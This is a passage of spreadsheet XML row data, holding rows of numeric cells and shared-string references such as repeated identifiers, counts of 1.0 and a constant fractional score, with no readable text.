        <v>24318</v>
      </c>
      <c r="F26472" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26473" ht="15.75" customHeight="1">
      <c r="A26473" s="1">
        <v>6726.0</v>
      </c>
      <c r="B26473" s="2">
        <v>4.9298771E7</v>
      </c>
      <c r="C26473" s="2" t="s">
        <v>25453</v>
      </c>
      <c r="D26473" s="2">
        <v>1.0</v>
      </c>
      <c r="E26473" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26473" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26474" ht="15.75" customHeight="1">
      <c r="A26474" s="1">
        <v>6767.0</v>
      </c>
      <c r="B26474" s="2">
        <v>4.9419737E7</v>
      </c>
      <c r="C26474" s="2" t="s">
        <v>25454</v>
      </c>
      <c r="D26474" s="2">
        <v>1.0</v>
      </c>
      <c r="E26474" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26474" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26475" ht="15.75" customHeight="1">
      <c r="A26475" s="1">
        <v>7200.0</v>
      </c>
      <c r="B26475" s="2">
        <v>5.0594248E7</v>
      </c>
      <c r="C26475" s="2" t="s">
        <v>25455</v>
      </c>
      <c r="D26475" s="2">
        <v>1.0</v>
      </c>
      <c r="E26475" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26475" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26476" ht="15.75" customHeight="1">
      <c r="A26476" s="1">
        <v>7245.0</v>
      </c>
      <c r="B26476" s="2">
        <v>5.0703926E7</v>
      </c>
      <c r="C26476" s="2" t="s">
        <v>25456</v>
      </c>
      <c r="D26476" s="2">
        <v>1.0</v>
      </c>
      <c r="E26476" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26476" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26477" ht="15.75" customHeight="1">
      <c r="A26477" s="1">
        <v>7588.0</v>
      </c>
      <c r="B26477" s="2">
        <v>5.1598345E7</v>
      </c>
      <c r="C26477" s="2" t="s">
        <v>25457</v>
      </c>
      <c r="D26477" s="2">
        <v>1.0</v>
      </c>
      <c r="E26477" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26477" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26478" ht="15.75" customHeight="1">
      <c r="A26478" s="1">
        <v>9012.0</v>
      </c>
      <c r="B26478" s="2">
        <v>5.4990084E7</v>
      </c>
      <c r="C26478" s="2" t="s">
        <v>25458</v>
      </c>
      <c r="D26478" s="2">
        <v>1.0</v>
      </c>
      <c r="E26478" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26478" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26479" ht="15.75" customHeight="1">
      <c r="A26479" s="1">
        <v>9060.0</v>
      </c>
      <c r="B26479" s="2">
        <v>5.5103122E7</v>
      </c>
      <c r="C26479" s="2" t="s">
        <v>25459</v>
      </c>
      <c r="D26479" s="2">
        <v>1.0</v>
      </c>
      <c r="E26479" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26479" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26480" ht="15.75" customHeight="1">
      <c r="A26480" s="1">
        <v>9124.0</v>
      </c>
      <c r="B26480" s="2">
        <v>5.5221518E7</v>
      </c>
      <c r="C26480" s="2" t="s">
        <v>25460</v>
      </c>
      <c r="D26480" s="2">
        <v>1.0</v>
      </c>
      <c r="E26480" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26480" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26481" ht="15.75" customHeight="1">
      <c r="A26481" s="1">
        <v>9255.0</v>
      </c>
      <c r="B26481" s="2">
        <v>5.5478011E7</v>
      </c>
      <c r="C26481" s="2" t="s">
        <v>25461</v>
      </c>
      <c r="D26481" s="2">
        <v>1.0</v>
      </c>
      <c r="E26481" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26481" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26482" ht="15.75" customHeight="1">
      <c r="A26482" s="1">
        <v>9323.0</v>
      </c>
      <c r="B26482" s="2">
        <v>5.5584931E7</v>
      </c>
      <c r="C26482" s="2" t="s">
        <v>25462</v>
      </c>
      <c r="D26482" s="2">
        <v>1.0</v>
      </c>
      <c r="E26482" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26482" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26483" ht="15.75" customHeight="1">
      <c r="A26483" s="1">
        <v>9788.0</v>
      </c>
      <c r="B26483" s="2">
        <v>5.6526549E7</v>
      </c>
      <c r="C26483" s="2" t="s">
        <v>25463</v>
      </c>
      <c r="D26483" s="2">
        <v>1.0</v>
      </c>
      <c r="E26483" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26483" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26484" ht="15.75" customHeight="1">
      <c r="A26484" s="1">
        <v>10992.0</v>
      </c>
      <c r="B26484" s="2">
        <v>1.7425642E7</v>
      </c>
      <c r="C26484" s="2" t="s">
        <v>25464</v>
      </c>
      <c r="D26484" s="2">
        <v>1.0</v>
      </c>
      <c r="E26484" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26484" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26485" ht="15.75" customHeight="1">
      <c r="A26485" s="1">
        <v>11136.0</v>
      </c>
      <c r="B26485" s="2">
        <v>1.9218034E7</v>
      </c>
      <c r="C26485" s="2" t="s">
        <v>25465</v>
      </c>
      <c r="D26485" s="2">
        <v>1.0</v>
      </c>
      <c r="E26485" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26485" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26486" ht="15.75" customHeight="1">
      <c r="A26486" s="1">
        <v>11459.0</v>
      </c>
      <c r="B26486" s="2">
        <v>2.1905716E7</v>
      </c>
      <c r="C26486" s="2" t="s">
        <v>25466</v>
      </c>
      <c r="D26486" s="2">
        <v>1.0</v>
      </c>
      <c r="E26486" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26486" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26487" ht="15.75" customHeight="1">
      <c r="A26487" s="1">
        <v>11689.0</v>
      </c>
      <c r="B26487" s="2">
        <v>2.3455024E7</v>
      </c>
      <c r="C26487" s="2" t="s">
        <v>25467</v>
      </c>
      <c r="D26487" s="2">
        <v>1.0</v>
      </c>
      <c r="E26487" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26487" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26488" ht="15.75" customHeight="1">
      <c r="A26488" s="1">
        <v>12254.0</v>
      </c>
      <c r="B26488" s="2">
        <v>2.7951938E7</v>
      </c>
      <c r="C26488" s="2" t="s">
        <v>25468</v>
      </c>
      <c r="D26488" s="2">
        <v>1.0</v>
      </c>
      <c r="E26488" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26488" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26489" ht="15.75" customHeight="1">
      <c r="A26489" s="1">
        <v>12433.0</v>
      </c>
      <c r="B26489" s="2">
        <v>2.921566E7</v>
      </c>
      <c r="C26489" s="2" t="s">
        <v>25469</v>
      </c>
      <c r="D26489" s="2">
        <v>1.0</v>
      </c>
      <c r="E26489" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26489" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26490" ht="15.75" customHeight="1">
      <c r="A26490" s="1">
        <v>12483.0</v>
      </c>
      <c r="B26490" s="2">
        <v>2.9499905E7</v>
      </c>
      <c r="C26490" s="2" t="s">
        <v>25470</v>
      </c>
      <c r="D26490" s="2">
        <v>1.0</v>
      </c>
      <c r="E26490" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26490" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26491" ht="15.75" customHeight="1">
      <c r="A26491" s="1">
        <v>12774.0</v>
      </c>
      <c r="B26491" s="2">
        <v>3.1267472E7</v>
      </c>
      <c r="C26491" s="2" t="s">
        <v>25471</v>
      </c>
      <c r="D26491" s="2">
        <v>1.0</v>
      </c>
      <c r="E26491" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26491" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26492" ht="15.75" customHeight="1">
      <c r="A26492" s="1">
        <v>13039.0</v>
      </c>
      <c r="B26492" s="2">
        <v>3.3071798E7</v>
      </c>
      <c r="C26492" s="2" t="s">
        <v>25472</v>
      </c>
      <c r="D26492" s="2">
        <v>1.0</v>
      </c>
      <c r="E26492" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26492" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26493" ht="15.75" customHeight="1">
      <c r="A26493" s="1">
        <v>13091.0</v>
      </c>
      <c r="B26493" s="2">
        <v>3.3452394E7</v>
      </c>
      <c r="C26493" s="2" t="s">
        <v>25473</v>
      </c>
      <c r="D26493" s="2">
        <v>1.0</v>
      </c>
      <c r="E26493" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26493" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26494" ht="15.75" customHeight="1">
      <c r="A26494" s="1">
        <v>13352.0</v>
      </c>
      <c r="B26494" s="2">
        <v>3.4734762E7</v>
      </c>
      <c r="C26494" s="2" t="s">
        <v>25474</v>
      </c>
      <c r="D26494" s="2">
        <v>1.0</v>
      </c>
      <c r="E26494" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26494" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26495" ht="15.75" customHeight="1">
      <c r="A26495" s="1">
        <v>14241.0</v>
      </c>
      <c r="B26495" s="2">
        <v>3.8314278E7</v>
      </c>
      <c r="C26495" s="2" t="s">
        <v>25475</v>
      </c>
      <c r="D26495" s="2">
        <v>1.0</v>
      </c>
      <c r="E26495" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26495" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26496" ht="15.75" customHeight="1">
      <c r="A26496" s="1">
        <v>14245.0</v>
      </c>
      <c r="B26496" s="2">
        <v>3.8359365E7</v>
      </c>
      <c r="C26496" s="2" t="s">
        <v>25476</v>
      </c>
      <c r="D26496" s="2">
        <v>1.0</v>
      </c>
      <c r="E26496" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26496" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26497" ht="15.75" customHeight="1">
      <c r="A26497" s="1">
        <v>14750.0</v>
      </c>
      <c r="B26497" s="2">
        <v>4.0749571E7</v>
      </c>
      <c r="C26497" s="2" t="s">
        <v>25477</v>
      </c>
      <c r="D26497" s="2">
        <v>1.0</v>
      </c>
      <c r="E26497" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26497" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26498" ht="15.75" customHeight="1">
      <c r="A26498" s="1">
        <v>14903.0</v>
      </c>
      <c r="B26498" s="2">
        <v>4.11593E7</v>
      </c>
      <c r="C26498" s="2" t="s">
        <v>25478</v>
      </c>
      <c r="D26498" s="2">
        <v>1.0</v>
      </c>
      <c r="E26498" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26498" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26499" ht="15.75" customHeight="1">
      <c r="A26499" s="1">
        <v>15483.0</v>
      </c>
      <c r="B26499" s="2">
        <v>4.3179936E7</v>
      </c>
      <c r="C26499" s="2" t="s">
        <v>25479</v>
      </c>
      <c r="D26499" s="2">
        <v>1.0</v>
      </c>
      <c r="E26499" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26499" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26500" ht="15.75" customHeight="1">
      <c r="A26500" s="1">
        <v>15485.0</v>
      </c>
      <c r="B26500" s="2">
        <v>4.3179936E7</v>
      </c>
      <c r="C26500" s="2" t="s">
        <v>25480</v>
      </c>
      <c r="D26500" s="2">
        <v>1.0</v>
      </c>
      <c r="E26500" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26500" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26501" ht="15.75" customHeight="1">
      <c r="A26501" s="1">
        <v>15892.0</v>
      </c>
      <c r="B26501" s="2">
        <v>4.4562673E7</v>
      </c>
      <c r="C26501" s="2" t="s">
        <v>25481</v>
      </c>
      <c r="D26501" s="2">
        <v>1.0</v>
      </c>
      <c r="E26501" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26501" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26502" ht="15.75" customHeight="1">
      <c r="A26502" s="1">
        <v>15957.0</v>
      </c>
      <c r="B26502" s="2">
        <v>4.4770538E7</v>
      </c>
      <c r="C26502" s="2" t="s">
        <v>25482</v>
      </c>
      <c r="D26502" s="2">
        <v>1.0</v>
      </c>
      <c r="E26502" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26502" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26503" ht="15.75" customHeight="1">
      <c r="A26503" s="1">
        <v>16523.0</v>
      </c>
      <c r="B26503" s="2">
        <v>4.6679944E7</v>
      </c>
      <c r="C26503" s="2" t="s">
        <v>25483</v>
      </c>
      <c r="D26503" s="2">
        <v>1.0</v>
      </c>
      <c r="E26503" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26503" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26504" ht="15.75" customHeight="1">
      <c r="A26504" s="1">
        <v>16654.0</v>
      </c>
      <c r="B26504" s="2">
        <v>4719527.0</v>
      </c>
      <c r="C26504" s="2" t="s">
        <v>25484</v>
      </c>
      <c r="D26504" s="2">
        <v>1.0</v>
      </c>
      <c r="E26504" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26504" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26505" ht="15.75" customHeight="1">
      <c r="A26505" s="1">
        <v>18278.0</v>
      </c>
      <c r="B26505" s="2">
        <v>5.2240878E7</v>
      </c>
      <c r="C26505" s="2" t="s">
        <v>25485</v>
      </c>
      <c r="D26505" s="2">
        <v>1.0</v>
      </c>
      <c r="E26505" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26505" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26506" ht="15.75" customHeight="1">
      <c r="A26506" s="1">
        <v>18373.0</v>
      </c>
      <c r="B26506" s="2">
        <v>5.2577789E7</v>
      </c>
      <c r="C26506" s="2" t="s">
        <v>25486</v>
      </c>
      <c r="D26506" s="2">
        <v>1.0</v>
      </c>
      <c r="E26506" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26506" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26507" ht="15.75" customHeight="1">
      <c r="A26507" s="1">
        <v>18448.0</v>
      </c>
      <c r="B26507" s="2">
        <v>5.2777984E7</v>
      </c>
      <c r="C26507" s="2" t="s">
        <v>25487</v>
      </c>
      <c r="D26507" s="2">
        <v>1.0</v>
      </c>
      <c r="E26507" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26507" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26508" ht="15.75" customHeight="1">
      <c r="A26508" s="1">
        <v>18568.0</v>
      </c>
      <c r="B26508" s="2">
        <v>5.3195455E7</v>
      </c>
      <c r="C26508" s="2" t="s">
        <v>25488</v>
      </c>
      <c r="D26508" s="2">
        <v>1.0</v>
      </c>
      <c r="E26508" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26508" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26509" ht="15.75" customHeight="1">
      <c r="A26509" s="1">
        <v>19080.0</v>
      </c>
      <c r="B26509" s="2">
        <v>5.4642422E7</v>
      </c>
      <c r="C26509" s="2" t="s">
        <v>25489</v>
      </c>
      <c r="D26509" s="2">
        <v>1.0</v>
      </c>
      <c r="E26509" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26509" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26510" ht="15.75" customHeight="1">
      <c r="A26510" s="1">
        <v>19251.0</v>
      </c>
      <c r="B26510" s="2">
        <v>5.5112824E7</v>
      </c>
      <c r="C26510" s="2" t="s">
        <v>25490</v>
      </c>
      <c r="D26510" s="2">
        <v>1.0</v>
      </c>
      <c r="E26510" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26510" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26511" ht="15.75" customHeight="1">
      <c r="A26511" s="1">
        <v>20307.0</v>
      </c>
      <c r="B26511" s="2">
        <v>1.1349535E7</v>
      </c>
      <c r="C26511" s="2" t="s">
        <v>25491</v>
      </c>
      <c r="D26511" s="2">
        <v>1.0</v>
      </c>
      <c r="E26511" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26511" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26512" ht="15.75" customHeight="1">
      <c r="A26512" s="1">
        <v>20411.0</v>
      </c>
      <c r="B26512" s="2">
        <v>1.221141E7</v>
      </c>
      <c r="C26512" s="2" t="s">
        <v>25492</v>
      </c>
      <c r="D26512" s="2">
        <v>1.0</v>
      </c>
      <c r="E26512" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26512" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26513" ht="15.75" customHeight="1">
      <c r="A26513" s="1">
        <v>20450.0</v>
      </c>
      <c r="B26513" s="2">
        <v>1.2508512E7</v>
      </c>
      <c r="C26513" s="2" t="s">
        <v>25493</v>
      </c>
      <c r="D26513" s="2">
        <v>1.0</v>
      </c>
      <c r="E26513" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26513" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26514" ht="15.75" customHeight="1">
      <c r="A26514" s="1">
        <v>20482.0</v>
      </c>
      <c r="B26514" s="2">
        <v>1.2837057E7</v>
      </c>
      <c r="C26514" s="2" t="s">
        <v>25494</v>
      </c>
      <c r="D26514" s="2">
        <v>1.0</v>
      </c>
      <c r="E26514" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26514" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26515" ht="15.75" customHeight="1">
      <c r="A26515" s="1">
        <v>20543.0</v>
      </c>
      <c r="B26515" s="2">
        <v>1.3361507E7</v>
      </c>
      <c r="C26515" s="2" t="s">
        <v>25495</v>
      </c>
      <c r="D26515" s="2">
        <v>1.0</v>
      </c>
      <c r="E26515" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26515" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26516" ht="15.75" customHeight="1">
      <c r="A26516" s="1">
        <v>20705.0</v>
      </c>
      <c r="B26516" s="2">
        <v>1.4541904E7</v>
      </c>
      <c r="C26516" s="2" t="s">
        <v>25496</v>
      </c>
      <c r="D26516" s="2">
        <v>1.0</v>
      </c>
      <c r="E26516" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26516" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26517" ht="15.75" customHeight="1">
      <c r="A26517" s="1">
        <v>20840.0</v>
      </c>
      <c r="B26517" s="2">
        <v>1.5635521E7</v>
      </c>
      <c r="C26517" s="2" t="s">
        <v>25497</v>
      </c>
      <c r="D26517" s="2">
        <v>1.0</v>
      </c>
      <c r="E26517" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26517" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26518" ht="15.75" customHeight="1">
      <c r="A26518" s="1">
        <v>20954.0</v>
      </c>
      <c r="B26518" s="2">
        <v>1.6648651E7</v>
      </c>
      <c r="C26518" s="2" t="s">
        <v>25498</v>
      </c>
      <c r="D26518" s="2">
        <v>1.0</v>
      </c>
      <c r="E26518" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26518" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26519" ht="15.75" customHeight="1">
      <c r="A26519" s="1">
        <v>21100.0</v>
      </c>
      <c r="B26519" s="2">
        <v>1.8104603E7</v>
      </c>
      <c r="C26519" s="2" t="s">
        <v>25499</v>
      </c>
      <c r="D26519" s="2">
        <v>1.0</v>
      </c>
      <c r="E26519" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26519" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26520" ht="15.75" customHeight="1">
      <c r="A26520" s="1">
        <v>21159.0</v>
      </c>
      <c r="B26520" s="2">
        <v>1.8878184E7</v>
      </c>
      <c r="C26520" s="2" t="s">
        <v>25500</v>
      </c>
      <c r="D26520" s="2">
        <v>1.0</v>
      </c>
      <c r="E26520" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26520" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26521" ht="15.75" customHeight="1">
      <c r="A26521" s="1">
        <v>21187.0</v>
      </c>
      <c r="B26521" s="2">
        <v>1.9260157E7</v>
      </c>
      <c r="C26521" s="2" t="s">
        <v>25501</v>
      </c>
      <c r="D26521" s="2">
        <v>1.0</v>
      </c>
      <c r="E26521" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26521" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26522" ht="15.75" customHeight="1">
      <c r="A26522" s="1">
        <v>21640.0</v>
      </c>
      <c r="B26522" s="2">
        <v>2.4724522E7</v>
      </c>
      <c r="C26522" s="2" t="s">
        <v>25502</v>
      </c>
      <c r="D26522" s="2">
        <v>1.0</v>
      </c>
      <c r="E26522" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26522" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26523" ht="15.75" customHeight="1">
      <c r="A26523" s="1">
        <v>21807.0</v>
      </c>
      <c r="B26523" s="2">
        <v>2.6757395E7</v>
      </c>
      <c r="C26523" s="2" t="s">
        <v>25503</v>
      </c>
      <c r="D26523" s="2">
        <v>1.0</v>
      </c>
      <c r="E26523" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26523" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26524" ht="15.75" customHeight="1">
      <c r="A26524" s="1">
        <v>22321.0</v>
      </c>
      <c r="B26524" s="2">
        <v>3.3994055E7</v>
      </c>
      <c r="C26524" s="2" t="s">
        <v>25504</v>
      </c>
      <c r="D26524" s="2">
        <v>1.0</v>
      </c>
      <c r="E26524" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26524" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26525" ht="15.75" customHeight="1">
      <c r="A26525" s="1">
        <v>22442.0</v>
      </c>
      <c r="B26525" s="2">
        <v>3625053.0</v>
      </c>
      <c r="C26525" s="2" t="s">
        <v>25505</v>
      </c>
      <c r="D26525" s="2">
        <v>1.0</v>
      </c>
      <c r="E26525" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26525" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26526" ht="15.75" customHeight="1">
      <c r="A26526" s="1">
        <v>22485.0</v>
      </c>
      <c r="B26526" s="2">
        <v>3.7021845E7</v>
      </c>
      <c r="C26526" s="2" t="s">
        <v>25506</v>
      </c>
      <c r="D26526" s="2">
        <v>1.0</v>
      </c>
      <c r="E26526" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26526" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26527" ht="15.75" customHeight="1">
      <c r="A26527" s="1">
        <v>22552.0</v>
      </c>
      <c r="B26527" s="2">
        <v>3.8243059E7</v>
      </c>
      <c r="C26527" s="2" t="s">
        <v>25507</v>
      </c>
      <c r="D26527" s="2">
        <v>1.0</v>
      </c>
      <c r="E26527" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26527" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26528" ht="15.75" customHeight="1">
      <c r="A26528" s="1">
        <v>22664.0</v>
      </c>
      <c r="B26528" s="2">
        <v>4.1347867E7</v>
      </c>
      <c r="C26528" s="2" t="s">
        <v>25508</v>
      </c>
      <c r="D26528" s="2">
        <v>1.0</v>
      </c>
      <c r="E26528" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26528" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26529" ht="15.75" customHeight="1">
      <c r="A26529" s="1">
        <v>22665.0</v>
      </c>
      <c r="B26529" s="2">
        <v>4.1348355E7</v>
      </c>
      <c r="C26529" s="2" t="s">
        <v>25509</v>
      </c>
      <c r="D26529" s="2">
        <v>1.0</v>
      </c>
      <c r="E26529" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26529" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26530" ht="15.75" customHeight="1">
      <c r="A26530" s="1">
        <v>22732.0</v>
      </c>
      <c r="B26530" s="2">
        <v>4.3973885E7</v>
      </c>
      <c r="C26530" s="2" t="s">
        <v>25510</v>
      </c>
      <c r="D26530" s="2">
        <v>1.0</v>
      </c>
      <c r="E26530" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26530" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26531" ht="15.75" customHeight="1">
      <c r="A26531" s="1">
        <v>22822.0</v>
      </c>
      <c r="B26531" s="2">
        <v>4.6306026E7</v>
      </c>
      <c r="C26531" s="2" t="s">
        <v>25511</v>
      </c>
      <c r="D26531" s="2">
        <v>1.0</v>
      </c>
      <c r="E26531" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26531" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26532" ht="15.75" customHeight="1">
      <c r="A26532" s="1">
        <v>22825.0</v>
      </c>
      <c r="B26532" s="2">
        <v>4.6365144E7</v>
      </c>
      <c r="C26532" s="2" t="s">
        <v>25512</v>
      </c>
      <c r="D26532" s="2">
        <v>1.0</v>
      </c>
      <c r="E26532" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26532" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26533" ht="15.75" customHeight="1">
      <c r="A26533" s="1">
        <v>23242.0</v>
      </c>
      <c r="B26533" s="2">
        <v>5.3014396E7</v>
      </c>
      <c r="C26533" s="2" t="s">
        <v>25513</v>
      </c>
      <c r="D26533" s="2">
        <v>1.0</v>
      </c>
      <c r="E26533" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26533" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26534" ht="15.75" customHeight="1">
      <c r="A26534" s="1">
        <v>23317.0</v>
      </c>
      <c r="B26534" s="2">
        <v>5433201.0</v>
      </c>
      <c r="C26534" s="2" t="s">
        <v>25498</v>
      </c>
      <c r="D26534" s="2">
        <v>1.0</v>
      </c>
      <c r="E26534" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26534" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26535" ht="15.75" customHeight="1">
      <c r="A26535" s="1">
        <v>23382.0</v>
      </c>
      <c r="B26535" s="2">
        <v>5.5588186E7</v>
      </c>
      <c r="C26535" s="2" t="s">
        <v>25514</v>
      </c>
      <c r="D26535" s="2">
        <v>1.0</v>
      </c>
      <c r="E26535" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26535" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26536" ht="15.75" customHeight="1">
      <c r="A26536" s="1">
        <v>23544.0</v>
      </c>
      <c r="B26536" s="2">
        <v>6024325.0</v>
      </c>
      <c r="C26536" s="2" t="s">
        <v>25515</v>
      </c>
      <c r="D26536" s="2">
        <v>1.0</v>
      </c>
      <c r="E26536" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26536" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26537" ht="15.75" customHeight="1">
      <c r="A26537" s="1">
        <v>23849.0</v>
      </c>
      <c r="B26537" s="2">
        <v>8195525.0</v>
      </c>
      <c r="C26537" s="2" t="s">
        <v>25516</v>
      </c>
      <c r="D26537" s="2">
        <v>1.0</v>
      </c>
      <c r="E26537" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26537" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26538" ht="15.75" customHeight="1">
      <c r="A26538" s="1">
        <v>23900.0</v>
      </c>
      <c r="B26538" s="2">
        <v>8481169.0</v>
      </c>
      <c r="C26538" s="2" t="s">
        <v>25517</v>
      </c>
      <c r="D26538" s="2">
        <v>1.0</v>
      </c>
      <c r="E26538" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26538" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="26539" ht="15.75" customHeight="1">
      <c r="A26539" s="1">
        <v>23930.0</v>
      </c>
      <c r="B26539" s="2">
        <v>8641255.0</v>
      </c>
      <c r="C26539" s="2" t="s">
        <v>25518</v>
      </c>
      <c r="D26539" s="2">
        <v>1.0</v>
      </c>
      <c r="E26539" s="3" t="s">
